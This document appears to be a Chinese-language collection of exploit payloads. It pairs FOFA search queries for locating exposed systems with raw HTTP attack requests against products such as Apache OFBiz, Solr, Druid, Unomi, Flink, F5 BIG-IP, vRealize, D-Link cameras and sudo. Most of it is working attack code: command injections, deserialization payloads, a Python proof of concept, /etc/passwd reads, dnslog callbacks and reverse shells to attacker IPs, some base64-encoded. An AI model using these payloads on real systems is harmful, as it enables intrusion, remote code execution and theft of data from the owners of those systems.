FOFA: title="MessageSolution Enterprise Email Archiving (EEA)" 

EXP：http://ip/authenticationserverservlet/

FOFA: app="D_Link-DCS-2530L"

EXP：http://ip/config/getuser?index=0

FOFA: title="TSCEV4.0"

POST /login HTTP/1.1Host: x.x.x.xConnection: closeContent-Length: 61Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: lang=cn
op=login&username=admin`ping wsgpgq.dnslog.cn`&password=admin

FOFA: title="京东薅羊毛控制面板"

POST /runCmd HTTP/1.1Host: x.x.x.xContent-Length: 54Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1Origin: http://x.x.x.xContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://x.x.x.x/runCmdAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: connect.0.13416810928385314=s%3ADihBr216xOtHaZ6_yq86aIF0UNpiCo5v.jLFQG19H1e%2FrP6NwaH0UX2tjYwsFQuhXIIaSIkVG4JgConnection: close
cmd=bash+jd.sh+%3Bcat+%2Fetc%2Fpasswd%3B+now&delay=500

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500

FOFA:title="vRealize Operations Manager"

POST /casa/nodes/thumbprints HTTP/1.1Host: x.x.x.xContent-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 20
["127.0.0.1:443/ui"]

FOFA:title=="Samsung WLAN AP"

POST /(download)/tmp/a.txt HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://x.x.x.x/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 48
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt

cp -r /opt/solr/server/solr/configsets/_default/conf /var/solr/data/new_core/

POST /solr/test/config HTTP/1.1Host: 10.0.133.170:8983Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://10.0.133.170:8983/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 84Content-type:application/json
{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1Host: 10.0.133.170:8983Content-type:application/x-www-form-urlencodedAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36X-Requested-With: XMLHttpRequestReferer: http://10.0.133.170:8983/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 29
stream.url=file:///etc/passwd

https://github.com/ltfafei/CVE-2021-26295_Apache_OFBiz_POC

java -jar ysoserial.jar URLDNS http://7qo3nk.dnslog.cn> dnslog.ot

python3 ot_trans_hex.py -f dnslog.ot

GET /webtools/control/SOAPService HTTP/1.1Host: 10.0.133.170:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: OFBiz.Visitor=10100Connection: closeContent-Length: 1030
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">     <soapenv:Header/>    <soapenv:Body>    <ser>    <map-HashMap>        <map-Entry>            <map-Key>                <cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74001037716f336e6b2e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f37716f336e6b2e646e736c6f672e636e78</cus-obj>            </map-Key>            <map-Value>                <std-String value="7qo3nk.dnslog.cn"/>            </map-Value>        </map-Entry>    </map-HashMap>    </ser>    </soapenv:Body>    </soapenv:Envelope> 

http://www.jackson-t.ca/runtime-exec-payloads.html

java -jar ysoserial.jar ROME  "bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMC4xMzMuMTQ4Lzk5OTkgPCYxJwo=}|{base64,-d}|{bash,-i}" | xxd|cut -f 2,3,4,5,6,7,8,9 -d " "|tr -d ' '|tr -d 'n'

import requests
def POC():    hex_data = "aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f400000000000007708000000020000000273720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e4f626a6563744265616e829907de7604944a0200034c000e5f636c6f6e6561626c654265616e74002d4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f436c6f6e6561626c654265616e3b4c000b5f657175616c734265616e74002a4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f457175616c734265616e3b4c000d5f746f537472696e674265616e74002c4c636f6d2f73756e2f73796e6469636174696f6e2f666565642f696d706c2f546f537472696e674265616e3b78707372002b636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e436c6f6e6561626c654265616edd61bbc5334f6b770200024c00115f69676e6f726550726f7065727469657374000f4c6a6176612f7574696c2f5365743b4c00045f6f626a7400124c6a6176612f6c616e672f4f626a6563743b78707372001e6a6176612e7574696c2e436f6c6c656374696f6e7324456d70747953657415f5721db403cb2802000078707371007e00027371007e000771007e000c7372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d657400124c6a6176612f6c616e672f537472696e673b4c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000705cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01007162617368202d63207b6563686f2c596d467a614341745979416e5a58686c5979426959584e6f494331704943592b4c32526c64693930593341764d5441754d4334784d7a4d754d5451344c7a6b354f546b67504359784a776f3d7d7c7b6261736536342c2d647d7c7b626173682c2d697d08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572313835343937373437343638373401001f4c79736f73657269616c2f50776e657231383534393737343734363837343b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000033000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000036000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e0017000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003a000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e72707701007873720028636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e457175616c734265616ef58a18bbe5f618110200024c000a5f6265616e436c6173737400114c6a6176612f6c616e672f436c6173733b4c00045f6f626a71007e000978707672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000787071007e00147372002a636f6d2e73756e2e73796e6469636174696f6e2e666565642e696d706c2e546f537472696e674265616e09f58e4a0f23ee310200024c000a5f6265616e436c61737371007e001c4c00045f6f626a71007e0009787071007e001f71007e00147371007e001b7671007e000271007e000d7371007e002071007e002371007e000d71007e000671007e000671007e000678"        headers = {'Content-Type': 'text/xml' }    post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><test:clearAllEntityCaches xmlns:test="http://ofbiz.apache.org/service/"><test:cus-obj>%s</test:cus-obj></test:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data        vuln_url = "http://10.0.133.170:8080/webtools/control/SOAPService"           response = requests.post(url=vuln_url, data=post_data, headers=headers)    if response.status_code == 200:        print("请求成功，请检查监听地址响应")        if __name__ == '__main__':    POC()

https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept

POST /mgmt/tm/util/bash HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}

POST /mgmt/tm/access/bundle-install-tasks HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 38
{"filePath":"`curl 48m8s3.dnslog.cn`"}

POST /mgmt/tm/access/bundle-install-tasks HTTP/1.1Host: 10.0.133.179Content-Type: application/jsonUser-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeAuthorization: Basic YWRtaW46QVNhc1M=X-F5-Auth-Token:Content-Length: 59
{"filePath":"`bash -i >& /dev/tcp/10.0.133.148/9090 0>&1`"}

https://mirrors.ocf.berkeley.edu/apache/druid/0.19.0/apache-druid-0.19.0-bin.tar.gz

tar -xzf apache-druid-0.19.0-bin.tar.gzcd apache-druid-0.19.0

./bin/start-micro-quickstart

quickstart/tutorial/

wikiticker-2015-09-12-sampled.json.gz

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1Host: 192.168.1.1:8888Content-Length: 705Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Content-Type: application/json;charset=UTF-8Origin: http://192.168.1.1:8888Referer: http://192.168.1.1:8888/unified-console.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.1.2/8000 0>&1')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

sudoedit -s /

POC地址：https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

cd CVE-2021-3156make./sudo-hax-me-a-sandwich root

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

POST /context.json HTTP/1.1Host: x.x.x.xConnection: closePragma: no-cacheCache-Control: no-cachesec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://x.x.x.x/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 491
{    "filters": [        {            "id": "sample",            "filters": [                {                    "condition": {                         "parameterValues": {                            "": "script::Runtime r = Runtime.getRuntime(); r.exec('ping uqn9ja.dnslog.cn');"                        },                        "type": "profilePropertyCondition"                    }                }            ]        }    ],    "sessionId": "sample"}

POST /context.json HTTP/1.1Host: 10.0.133.170:8181User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: http://10.0.133.170:8181/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 1115
{  "personalizations":[    {      "id":"gender-test",      "strategy":"matching-first",      "strategyOptions":{        "fallback":"var2"      },      "contents":[        {          "filters":[            {              "condition":{                "parameterValues":{                  "propertyName":"(#runtimeclass = #this.getClass().forName("java.lang.Runtime")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals("getRuntime")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals("exec")}.{? #this.getParameters()[0].getType().getName().equals("java.lang.String")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,"/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.0.133.148/9999 0>&1"))",                  "comparisonOperator":"equals",                  "propertyValue":"male"                },                "type":"profilePropertyCondition"              }            }          ]        }      ]    }  ],  "sessionId":"sample"}